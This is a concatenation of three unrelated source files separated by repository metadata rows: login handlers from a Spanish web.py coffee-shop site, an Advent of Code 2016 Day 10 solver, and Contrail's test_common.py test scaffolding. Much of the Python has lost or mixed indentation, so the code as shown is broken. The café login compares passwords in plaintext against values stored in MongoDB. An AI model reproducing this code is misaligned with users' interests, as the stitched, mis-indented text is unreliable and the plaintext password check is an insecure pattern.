us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
					error='contraseña erronea'
			except TypeError:
				log=False
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe4:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
		#Variables used to populate the web page
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion detallada del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
			#look up the user in the database
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
					error='contraseña erronea'
			except TypeError:
				log=False
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
| gpl-2.0 | -8,106,485,634,979,966,000 | 29.345161 | 155 | 0.523015 | false |
ImpregnableProgrammer/Advent-of-Code | 2016/Day_10.py | 1 | 2375 | import re
# First Part
def First_Part(s):
Bot_Dict = {}
g=0
s=s.split('\n')
while 1:
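    # "output N" targets are rewritten to negative ids (-N-1) so bots and outputs share one dict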
    p=re.sub(r'(?<=output )\d+',lambda k:str(-int(k.group(0))-1),s[g%len(s)])
    G=re.findall(r'-?\d+',p)
if p[:3]=='bot' and G[0] in Bot_Dict.keys() and len(Bot_Dict[G[0]])>1:
if sorted(Bot_Dict[G[0]],key=int)==['17','61']:
print(G[0])
break
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
if G[2] not in Bot_Dict.keys():
Bot_Dict[G[2]]=[]
X=len(Bot_Dict[G[1]])
Y=len(Bot_Dict[G[2]])
Bot_Dict[G[1]]+=(G[1][0]=='-' or (G[1][0]!='-' and X<2)) and [min(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[2]]+=(G[2][0]=='-' or (G[2][0]!='-' and Y<2)) and [max(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[0]]=(G[1][0]!='-' and X>1) and [min(Bot_Dict[G[0]],key=int)] or (G[2][0]!='-' and Y>1) and [max(Bot_Dict[G[0]],key=int)] or []
elif p[:5]=='value':
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
Bot_Dict[G[1]]+=len(Bot_Dict[G[1]])<2 and [G[0]] or []
g+=1
# Second Part
def Second_Part(s):
Bot_Dict = {}
g=0
s=s.split('\n')
while 1:
    p=re.sub(r'(?<=output )\d+',lambda k:str(-int(k.group(0))-1),s[g%len(s)])
    G=re.findall(r'-?\d+',p)
if p[:3]=='bot' and G[0] in Bot_Dict.keys() and len(Bot_Dict[G[0]])>1:
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
if G[2] not in Bot_Dict.keys():
Bot_Dict[G[2]]=[]
X=len(Bot_Dict[G[1]])
Y=len(Bot_Dict[G[2]])
Bot_Dict[G[1]]+=(G[1][0]=='-' or (G[1][0]!='-' and X<2)) and [min(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[2]]+=(G[2][0]=='-' or (G[2][0]!='-' and Y<2)) and [max(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[0]]=(G[1][0]!='-' and X>1) and [min(Bot_Dict[G[0]],key=int)] or (G[2][0]!='-' and Y>1) and [max(Bot_Dict[G[0]],key=int)] or []
elif p[:5]=='value':
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
Bot_Dict[G[1]]+=len(Bot_Dict[G[1]])<2 and [G[0]] or []
g+=1
if len(s)<1:
j=1
for o in Bot_Dict.keys():
if 0>int(o)>-4:
j*=int(Bot_Dict[o][0])
print(j)
break
| gpl-3.0 | -5,439,650,238,929,213,000 | 35.538462 | 145 | 0.442526 | false |
rombie/contrail-controller | src/config/common/tests/test_common.py | 1 | 42367 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent.monkey
gevent.monkey.patch_all()
import logging
import tempfile
import mock
from pprint import pformat
import coverage
import fixtures
import testtools
from testtools import content
from flexmock import flexmock
from webtest import TestApp
import contextlib
from netaddr import IPNetwork, IPAddress
from vnc_api.vnc_api import *
import kombu
import cfgm_common.zkclient
from cfgm_common.uve.vnc_api.ttypes import VncApiConfigLog
from cfgm_common import vnc_cgitb
from cfgm_common.utils import cgitb_hook
from test_utils import *
import bottle
bottle.catchall=False
import inspect
import novaclient
import novaclient.client
import gevent.pywsgi
import uuid
from pysandesh import sandesh_logger
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
# end lineno
try:
import vnc_cfg_api_server
if not hasattr(vnc_cfg_api_server, 'main'):
from vnc_cfg_api_server import vnc_cfg_api_server
except ImportError:
vnc_cfg_api_server = 'vnc_cfg_api_server could not be imported'
try:
import to_bgp
except ImportError:
try:
from schema_transformer import to_bgp
except ImportError:
to_bgp = 'to_bgp could not be imported'
try:
import svc_monitor
if not hasattr(svc_monitor, 'main'):
from svc_monitor import svc_monitor
except ImportError:
svc_monitor = 'svc_monitor could not be imported'
try:
import device_manager
if hasattr(device_manager, 'DeviceManager'):
import dm_server
else:
from device_manager import dm_server
from device_manager import device_manager
except ImportError:
device_manager = 'device_manager could not be imported'
try:
from kube_manager import kube_manager
if not hasattr(kube_manager, 'main'):
from kube_manager import kube_manager
except ImportError:
kube_manager = 'kube_manager could not be imported'
try:
from mesos_manager import mesos_manager
if not hasattr(mesos_manager, 'main'):
from mesos_manager import mesos_manager
except ImportError:
mesos_manager = 'mesos_manager could not be imported'
def generate_conf_file_contents(conf_sections):
cfg_parser = ConfigParser.RawConfigParser()
for (section, var, val) in conf_sections:
try:
cfg_parser.add_section(section)
except ConfigParser.DuplicateSectionError:
pass
if not var:
continue
if val == '':
cfg_parser.set(section, var, 'empty')
else:
cfg_parser.set(section, var, val)
return cfg_parser
# end generate_conf_file_contents
def generate_logconf_file_contents():
cfg_parser = ConfigParser.RawConfigParser()
cfg_parser.add_section('formatters')
cfg_parser.add_section('formatter_simple')
cfg_parser.set('formatters', 'keys', 'simple')
cfg_parser.set('formatter_simple', 'format', '%(name)s:%(levelname)s: %(message)s')
cfg_parser.add_section('handlers')
cfg_parser.add_section('handler_console')
cfg_parser.add_section('handler_api_server_file')
cfg_parser.set('handlers', 'keys', 'console,api_server_file')
cfg_parser.set('handler_console', 'class', 'StreamHandler')
cfg_parser.set('handler_console', 'level', 'WARN')
cfg_parser.set('handler_console', 'args', '[]')
cfg_parser.set('handler_console', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'class', 'FileHandler')
cfg_parser.set('handler_api_server_file', 'level', 'INFO')
cfg_parser.set('handler_api_server_file', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'args', "('api_server.log',)")
cfg_parser.add_section('loggers')
cfg_parser.add_section('logger_root')
cfg_parser.add_section('logger_FakeWSGIHandler')
cfg_parser.set('loggers', 'keys', 'root,FakeWSGIHandler')
cfg_parser.set('logger_root', 'level', 'WARN')
cfg_parser.set('logger_root', 'handlers', 'console')
cfg_parser.set('logger_FakeWSGIHandler', 'level', 'INFO')
cfg_parser.set('logger_FakeWSGIHandler', 'qualname', 'FakeWSGIHandler')
cfg_parser.set('logger_FakeWSGIHandler', 'handlers', 'api_server_file')
return cfg_parser
# end generate_logconf_file_contents
def launch_kube_manager(test_id, conf_sections, kube_api_skip, event_queue,
vnc_kubernetes_config_dict=None):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_kube_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
kube_manager.main(args_str, kube_api_skip=kube_api_skip,
event_queue=event_queue,
vnc_kubernetes_config_dict=vnc_kubernetes_config_dict)
#end launch_kube_manager
def launch_mesos_manager(test_id, conf_sections, mesos_api_skip, event_queue):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_mesos_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
mesos_manager.main(args_str, mesos_api_skip=mesos_api_skip, event_queue=event_queue)
#end launch_mesos_manager
def retry_exc_handler(tries_remaining, exception, delay):
print >> sys.stderr, "Caught '%s', %d tries remaining, sleeping for %s seconds" % (exception, tries_remaining, delay)
# end retry_exc_handler
def retries(max_tries, delay=1, backoff=2, exceptions=(Exception,), hook=None):
def dec(func):
def f2(*args, **kwargs):
mydelay = delay
tries = range(max_tries)
tries.reverse()
for tries_remaining in tries:
try:
return func(*args, **kwargs)
except exceptions as e:
if tries_remaining > 0:
if hook is not None:
hook(tries_remaining, e, mydelay)
gevent.sleep(mydelay)
mydelay = mydelay * backoff
else:
raise
else:
break
return f2
return dec
# end retries
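# Example usage (illustrative only): retry a flaky call up to 3 times, starting
# with a 2 second delay that doubles after each failure, catching only IOError:
#
#   @retries(3, delay=2, backoff=2, exceptions=(IOError,), hook=retry_exc_handler)
#   def read_remote_file(path):
#       ...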
class VncTestApp(TestApp):
def post_json(self, *args, **kwargs):
resp = super(VncTestApp, self).post_json(*args, **kwargs)
resp.charset = 'UTF-8'
return resp
#end class VncTestApp
def create_api_server_instance(test_id, config_knobs, db='cassandra'):
ret_server_info = {}
allocated_sockets = []
ret_server_info['ip'] = socket.gethostbyname(socket.gethostname())
ret_server_info['service_port'] = get_free_port(allocated_sockets)
ret_server_info['introspect_port'] = get_free_port(allocated_sockets)
ret_server_info['admin_port'] = get_free_port(allocated_sockets)
ret_server_info['allocated_sockets'] = allocated_sockets
if db == "cassandra":
ret_server_info['greenlet'] = gevent.spawn(launch_api_server,
test_id, ret_server_info['ip'], ret_server_info['service_port'],
ret_server_info['introspect_port'], ret_server_info['admin_port'],
config_knobs)
else:
msg = ("Contrail API server does not support database backend "
"'%s'" % db)
raise NotImplementedError(msg)
block_till_port_listened(ret_server_info['ip'],
ret_server_info['service_port'])
extra_env = {'HTTP_HOST': ret_server_info['ip'],
'SERVER_PORT': str(ret_server_info['service_port'])}
api_server_obj = ret_server_info['greenlet'].api_server
ret_server_info['app'] = VncTestApp(api_server_obj.api_bottle,
extra_environ=extra_env)
ret_server_info['api_conn'] = VncApi('u', 'p',
api_server_host=ret_server_info['ip'],
api_server_port=ret_server_info['service_port'])
if FakeNovaClient.vnc_lib is None:
FakeNovaClient.vnc_lib = ret_server_info['api_conn']
ret_server_info['api_session'] = requests.Session()
adapter = requests.adapters.HTTPAdapter()
ret_server_info['api_session'].mount("http://", adapter)
ret_server_info['api_session'].mount("https://", adapter)
ret_server_info['api_server'] = api_server_obj
ret_server_info['api_server']._sandesh.set_logging_level(level="SYS_DEBUG")
return ret_server_info
# end create_api_server_instance
def destroy_api_server_instance(server_info):
server_info['greenlet'].kill()
if hasattr(server_info['api_server']._db_conn, '_msgbus'):
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
FakeKombu.reset(vhost_url)
FakeNovaClient.reset()
CassandraCFs.reset()
FakeKazooClient.reset()
FakeExtensionManager.reset()
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def destroy_api_server_instance_issu(server_info):
server_info['greenlet'].kill()
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def launch_api_server(test_id, listen_ip, listen_port, http_server_port,
admin_port, conf_sections):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'vnc_cfg_api_server.vnc_cfg_api_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
args_str = ""
args_str = args_str + "--listen_ip_addr %s " % (listen_ip)
args_str = args_str + "--listen_port %s " % (listen_port)
args_str = args_str + "--http_server_port %s " % (http_server_port)
args_str = args_str + "--admin_port %s " % (admin_port)
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file api_server_%s.log " %(test_id)
args_str = args_str + "--cluster_id %s " %(test_id)
vnc_cgitb.enable(format='text')
with tempfile.NamedTemporaryFile() as conf, \
tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str = args_str + "--conf_file %s " %(conf.name)
args_str = args_str + "--logging_conf %s " %(logconf.name)
server = vnc_cfg_api_server.VncApiServer(args_str)
gevent.getcurrent().api_server = server
vnc_cfg_api_server.main(args_str, server)
# end launch_api_server
def launch_svc_monitor(cluster_id, test_id, api_server_ip, api_server_port, **extra_args):
allocated_sockets = []
args_str = ""
args_str += "--cluster_id %s " % (cluster_id)
args_str += "--api_server_ip %s " % (api_server_ip)
args_str += "--api_server_port %s " % (api_server_port)
args_str += "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str += "--cassandra_server_list 0.0.0.0:9160 "
args_str += "--log_local "
args_str += "--log_file svc_monitor_%s.log " %(test_id)
args_str += "--trace_file svc_monitor_%s.err " %(test_id)
args_str += "--check_service_interval 2 "
for name, value in extra_args.items():
args_str += "--{name} {value} ".format(name=name, value=value)
svc_monitor.main(args_str)
# end launch_svc_monitor
def kill_svc_monitor(glet):
glet.kill()
svc_monitor.SvcMonitor.reset()
def kill_schema_transformer(glet):
glet.kill()
to_bgp.SchemaTransformer.destroy_instance()
def kill_device_manager(glet):
glet.kill()
dm_server.sigterm_handler()
def kill_kube_manager(glet):
glet.kill()
kube_manager.KubeNetworkManager.destroy_instance()
def kill_mesos_manager(glet):
glet.kill()
mesos_manager.MesosNetworkManager.destroy_instance()
def reinit_schema_transformer():
for obj_cls in to_bgp.DBBaseST.get_obj_type_map().values():
obj_cls.reset()
to_bgp.transformer.reinit()
def launch_schema_transformer(cluster_id, test_id, api_server_ip,
api_server_port, extra_args=None):
allocated_sockets = []
wait_for_schema_transformer_down()
args_str = ""
args_str = args_str + "--cluster_id %s " % (cluster_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file schema_transformer_%s.log " %(test_id)
args_str = args_str + "--trace_file schema_transformer_%s.err " %(test_id)
if extra_args:
args_str = args_str + (extra_args)
to_bgp.main(args_str)
# end launch_schema_transformer
def launch_device_manager(test_id, api_server_ip, api_server_port,
conf_sections=None):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'device_manager.dm_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
wait_for_device_manager_down()
allocated_sockets = []
args_str = ""
args_str = args_str + "--cluster_id %s " % (test_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file device_manager_%s.log " %(test_id)
if conf_sections is not None:
with tempfile.NamedTemporaryFile() as conf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
args_str = args_str + "--conf_file %s " % conf.name
dm_server.main(args_str)
else:
dm_server.main(args_str)
# end launch_device_manager
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_up():
if not to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_down():
if to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_up():
if not device_manager.DeviceManager.get_instance():
raise Exception("DM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_down():
if device_manager.DeviceManager.get_instance():
raise Exception("DM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_up():
if not kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_down():
if kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_up():
if not mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_down():
if mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is up, no new instances allowed")
@contextlib.contextmanager
def flexmocks(mocks):
orig_values = {}
try:
for cls, method_name, val in mocks:
kwargs = {method_name: val}
# save orig cls.method_name
orig_values[(cls, method_name)] = getattr(cls, method_name)
flexmock(cls, **kwargs)
yield
finally:
for (cls, method_name), method in orig_values.items():
setattr(cls, method_name, method)
# end flexmocks
def setup_extra_flexmock(mocks):
for (cls, method_name, val) in mocks:
kwargs = {method_name: val}
flexmock(cls, **kwargs)
# end setup_extra_flexmock
def setup_mocks(mod_attr_val_list):
# use setattr instead of flexmock because flexmocks are torndown
# after every test in stopTest whereas these mocks are needed across
# all tests in class
orig_mod_attr_val_list = []
for mod, attr, val in mod_attr_val_list:
orig_mod_attr_val_list.append(
(mod, attr, getattr(mod, attr)))
setattr(mod, attr, val)
return orig_mod_attr_val_list
#end setup_mocks
def teardown_mocks(mod_attr_val_list):
for mod, attr, val in mod_attr_val_list:
setattr(mod, attr, val)
# end teardown_mocks
@contextlib.contextmanager
def patch(target_obj, target_method_name, patched):
orig_method = getattr(target_obj, target_method_name)
def patched_wrapper(*args, **kwargs):
return patched(orig_method, *args, **kwargs)
setattr(target_obj, target_method_name, patched_wrapper)
try:
yield
finally:
setattr(target_obj, target_method_name, orig_method)
#end patch
@contextlib.contextmanager
def patch_imports(imports):
# save original, patch and restore
orig_modules = {}
mocked_modules = []
try:
for import_str, fake in imports:
cur_module = None
for mod_part in import_str.split('.'):
if not cur_module:
cur_module = mod_part
else:
cur_module += "." + mod_part
if cur_module in sys.modules:
orig_modules[cur_module] = sys.modules[cur_module]
else:
mocked_modules.append(cur_module)
sys.modules[cur_module] = fake
yield
finally:
for mod_name, mod in orig_modules.items():
sys.modules[mod_name] = mod
for mod_name in mocked_modules:
del sys.modules[mod_name]
#end patch_import
cov_handle = None
class TestCase(testtools.TestCase, fixtures.TestWithFixtures):
_HTTP_HEADERS = {
'Content-type': 'application/json; charset="UTF-8"',
}
_config_knobs = [
('DEFAULTS', '', ''),
]
mocks = [
(novaclient.client, 'Client', FakeNovaClient.initialize),
(pycassa.system_manager.Connection, '__init__',stub),
(pycassa.system_manager.SystemManager, '__new__',FakeSystemManager),
(pycassa.ConnectionPool, '__new__',FakeConnectionPool),
(pycassa.ColumnFamily, '__new__',FakeCF),
(pycassa.util, 'convert_uuid_to_time',Fake_uuid_to_time),
(kazoo.client.KazooClient, '__new__',FakeKazooClient),
(kazoo.recipe.counter.Counter, '__init__',fake_zk_counter_init),
(kazoo.recipe.counter.Counter, '_change',fake_zk_counter_change),
(kazoo.recipe.counter.Counter, 'value',fake_zk_counter_value),
(kazoo.recipe.counter.Counter, '_ensure_node',
fake_zk_counter_ensure_node),
(kazoo.handlers.gevent.SequentialGeventHandler, '__init__',stub),
(kombu.Connection, '__new__',FakeKombu.Connection),
(kombu.Exchange, '__new__',FakeKombu.Exchange),
(kombu.Queue, '__new__',FakeKombu.Queue),
(kombu.Consumer, '__new__',FakeKombu.Consumer),
(kombu.Producer, '__new__',FakeKombu.Producer),
(VncApiConfigLog, '__new__',FakeApiConfigLog),
]
def __init__(self, *args, **kwargs):
self._logger = logging.getLogger(__name__)
self._assert_till_max_tries = 600
super(TestCase, self).__init__(*args, **kwargs)
self.addOnException(self._add_detailed_traceback)
def _add_detailed_traceback(self, exc_info):
vnc_cgitb.enable(format='text')
from cStringIO import StringIO
tmp_file = StringIO()
cgitb_hook(format="text", file=tmp_file, info=exc_info)
tb_str = tmp_file.getvalue()
tmp_file.close()
self.addDetail('detailed-traceback', content.text_content(tb_str))
def _add_detail(self, detail_str):
frame = inspect.stack()[1]
self.addDetail('%s:%s ' %(frame[1],frame[2]), content.text_content(detail_str))
def _add_request_detail(self, op, url, headers=None, query_params=None,
body=None):
request_str = ' URL: ' + pformat(url) + \
' OPER: ' + pformat(op) + \
' Headers: ' + pformat(headers) + \
' Query Params: ' + pformat(query_params) + \
' Body: ' + pformat(body)
self._add_detail('Requesting: ' + request_str)
def _http_get(self, uri, query_params=None):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('GET', url, headers=self._HTTP_HEADERS,
query_params=query_params)
response = self._api_server_session.get(url, headers=self._HTTP_HEADERS,
params=query_params)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_get
def _http_post(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('POST', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.post(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_post
def _http_delete(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('DELETE', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.delete(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_delete
def _http_put(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('PUT', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.put(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_put
def _create_test_objects(self, count=1, proj_obj=None):
ret_objs = []
for i in range(count):
obj_name = self.id() + '-vn-' + str(i)
obj = VirtualNetwork(obj_name, parent_obj=proj_obj)
self._add_detail('creating-object ' + obj_name)
self._vnc_lib.virtual_network_create(obj)
ret_objs.append(obj)
return ret_objs
def _create_test_object(self):
return self._create_test_objects()[0]
def _delete_test_object(self, obj):
self._vnc_lib.virtual_network_delete(id=obj.uuid)
def get_cf(self, keyspace_name, cf_name):
ks_name = '%s_%s' %(self._cluster_id, keyspace_name)
return CassandraCFs.get_cf(ks_name, cf_name)
# end get_cf
def vnc_db_has_ident(self, obj=None, id=None, type_fq_name=None):
if obj:
_type = obj.get_type()
_fq_name = obj.get_fq_name()
if id:
_type = self._vnc_lib.id_to_fq_name_type(id)
_fq_name = self._vnc_lib.id_to_fq_name(id)
if type_fq_name:
_type = type_fq_name[0]
_fq_name = type_fq_name[1]
try:
vnc_obj = self._vnc_lib._object_read(_type, _fq_name)
except NoIdError:
return None
return vnc_obj
def vnc_db_ident_has_prop(self, obj, prop_name, prop_value):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
return getattr(vnc_obj, prop_name) == prop_value
def vnc_db_ident_has_ref(self, obj, ref_name, ref_fq_name):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
refs = getattr(vnc_obj, ref_name, [])
for ref in refs:
if ref['to'] == ref_fq_name:
return True
return False
def vnc_db_doesnt_have_ident(self, obj=None, id=None, type_fq_name=None):
return not self.vnc_db_has_ident(obj=obj, id=id,
type_fq_name=type_fq_name)
def vnc_db_ident_doesnt_have_ref(self, obj, ref_name, ref_fq_name=None):
return not self.vnc_db_ident_has_ref(obj, ref_name, ref_fq_name)
def assertTill(self, expr_or_cb, *cb_args, **cb_kwargs):
tries = 0
while True:
if callable(expr_or_cb):
ret = expr_or_cb(*cb_args, **cb_kwargs)
else:
ret = eval(expr_or_cb)
if ret:
break
tries = tries + 1
if tries >= self._assert_till_max_tries:
raise Exception('Max retries')
self._logger.warn('Retrying at ' + str(inspect.stack()[1]))
gevent.sleep(0.1)
@classmethod
def setUpClass(cls, extra_mocks=None, extra_config_knobs=None,
db='cassandra'):
super(TestCase, cls).setUpClass()
global cov_handle
if not cov_handle:
cov_handle = coverage.coverage(source=['./'], omit=['.venv/*'])
#cov_handle.start()
cfgm_common.zkclient.LOG_DIR = './'
gevent.pywsgi.WSGIServer.handler_class = FakeWSGIHandler
cls.orig_mocked_values = setup_mocks(cls.mocks + (extra_mocks or []))
cls._cluster_id = cls.__name__
cls._server_info = create_api_server_instance(
cls._cluster_id, cls._config_knobs + (extra_config_knobs or []),
db=db)
try:
cls._api_server_ip = cls._server_info['ip']
cls._api_server_port = cls._server_info['service_port']
cls._api_admin_port = cls._server_info['admin_port']
cls._api_svr_greenlet = cls._server_info['greenlet']
cls._api_svr_app = cls._server_info['app']
cls._vnc_lib = cls._server_info['api_conn']
cls._api_server_session = cls._server_info['api_session']
cls._api_server = cls._server_info['api_server']
except Exception as e:
cls.tearDownClass()
raise
# end setUpClass
@classmethod
def tearDownClass(cls):
destroy_api_server_instance(cls._server_info)
teardown_mocks(cls.orig_mocked_values)
# end tearDownClass
def setUp(self, extra_mocks=None, extra_config_knobs=None):
self._logger.info("Running %s" %(self.id()))
super(TestCase, self).setUp()
# end setUp
def tearDown(self):
self._logger.info("Finished %s" %(self.id()))
self.wait_till_api_server_idle()
super(TestCase, self).tearDown()
# end tearDown
def wait_till_api_server_idle(self):
# wait for in-flight messages to be processed
if hasattr(self._api_server._db_conn, '_msgbus'):
while self._api_server._db_conn._msgbus.num_pending_messages() > 0:
gevent.sleep(0.001)
vhost_url = self._api_server._db_conn._msgbus._urls
while not FakeKombu.is_empty(vhost_url, 'vnc_config'):
gevent.sleep(0.001)
# wait_till_api_server_idle
def create_virtual_network(self, vn_name, vn_subnet='10.0.0.0/24'):
vn_obj = VirtualNetwork(name=vn_name)
ipam_fq_name = [
'default-domain', 'default-project', 'default-network-ipam']
ipam_obj = self._vnc_lib.network_ipam_read(fq_name=ipam_fq_name)
subnets = [vn_subnet] if isinstance(vn_subnet, basestring) else vn_subnet
subnet_infos = []
for subnet in subnets:
cidr = IPNetwork(subnet)
subnet_infos.append(
IpamSubnetType(
subnet=SubnetType(
str(cidr.network),
int(cidr.prefixlen),
),
default_gateway=str(IPAddress(cidr.last - 1)),
subnet_uuid=str(uuid.uuid4()),
)
)
subnet_data = VnSubnetsType(subnet_infos)
vn_obj.add_network_ipam(ipam_obj, subnet_data)
self._vnc_lib.virtual_network_create(vn_obj)
